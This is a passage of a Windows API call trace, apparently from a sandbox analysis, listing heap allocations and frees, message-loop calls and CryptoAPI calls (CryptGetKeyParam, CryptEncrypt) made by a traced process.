lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0125.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0125.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0125.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0125.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0125.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0125.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0125.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0125.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0125.896] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0125.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0125.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0125.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0125.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0125.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0125.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0125.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0125.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0125.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0125.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0125.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0125.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0125.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0125.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0125.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0125.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0125.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0125.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0125.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0125.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0125.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0125.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0125.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0125.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0125.897] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0125.897] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796fc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0125.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0125.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0125.898] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0125.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0125.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0125.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0125.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0125.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0125.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0125.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0125.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0125.898] CryptGetKeyParam (in: hKey=0x41ac140, dwParam=0x7, pbData=0x43e2850, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2850*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0125.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0125.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0125.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0125.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0125.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0125.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0125.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0125.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0125.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0125.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0125.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0125.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0125.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0125.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0125.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0125.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0125.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0125.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0125.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0125.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0125.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0125.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0125.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0125.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0125.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0125.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0125.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0125.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0125.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0125.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0125.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0125.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0125.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0125.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0125.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0125.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0125.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0125.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0125.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0125.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0125.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0125.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0125.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0125.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0125.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0125.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0125.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0125.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0125.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0125.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0125.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0125.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0125.954] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0125.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0125.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9578 | out: hHeap=0x1780000) returned 1 [0125.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0125.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0125.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0125.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0125.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0125.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0125.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0125.954] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0125.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0125.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0125.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0125.954] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0125.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0125.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0125.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0125.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0125.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0125.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0125.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0125.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0125.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0125.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0125.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0125.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0125.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0125.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0125.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0125.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0125.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0125.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0125.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0125.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0125.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0125.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0125.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0125.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0125.955] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0125.955] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0125.956] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0126.041] TranslateMessage (lpMsg=0x144edac) returned 0 [0126.041] DispatchMessageW (lpMsg=0x144edac) returned 0x0 [0126.041] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0126.041] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0126.041] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0126.041] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0126.042] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0126.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0126.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cad30, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0126.042] CryptEncrypt (in: hKey=0x41ac140, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0xff62, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0xff70) returned 1 [0126.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0126.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e99c8 [0126.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0126.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0126.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0126.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0126.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0126.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0126.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0126.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0126.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0126.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0126.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0126.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0126.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0126.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0126.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0126.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0126.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0126.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0126.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0126.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0126.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0126.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0126.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0126.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0126.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0126.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0126.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0126.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0126.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0126.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0126.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0126.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0126.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0126.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0126.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0126.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9128 [0126.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0126.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0126.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0126.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0126.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0126.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0126.045] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0126.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0126.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0126.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0126.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0126.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0126.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0126.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0126.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0126.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0126.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0126.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0126.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0126.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0126.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0126.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0126.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0126.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0126.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0126.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0126.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0126.046] CharLowerBuffW (in: lpsz="byte[65393]", cchLength=0xb | out: lpsz="byte[65393]") returned 0xb [0126.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0126.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0126.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0126.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0126.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0126.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0126.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0126.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0126.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0126.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0126.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xff71) returned 0x49d9e60 [0126.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ea8 [0126.046] RtlAllocateHeap 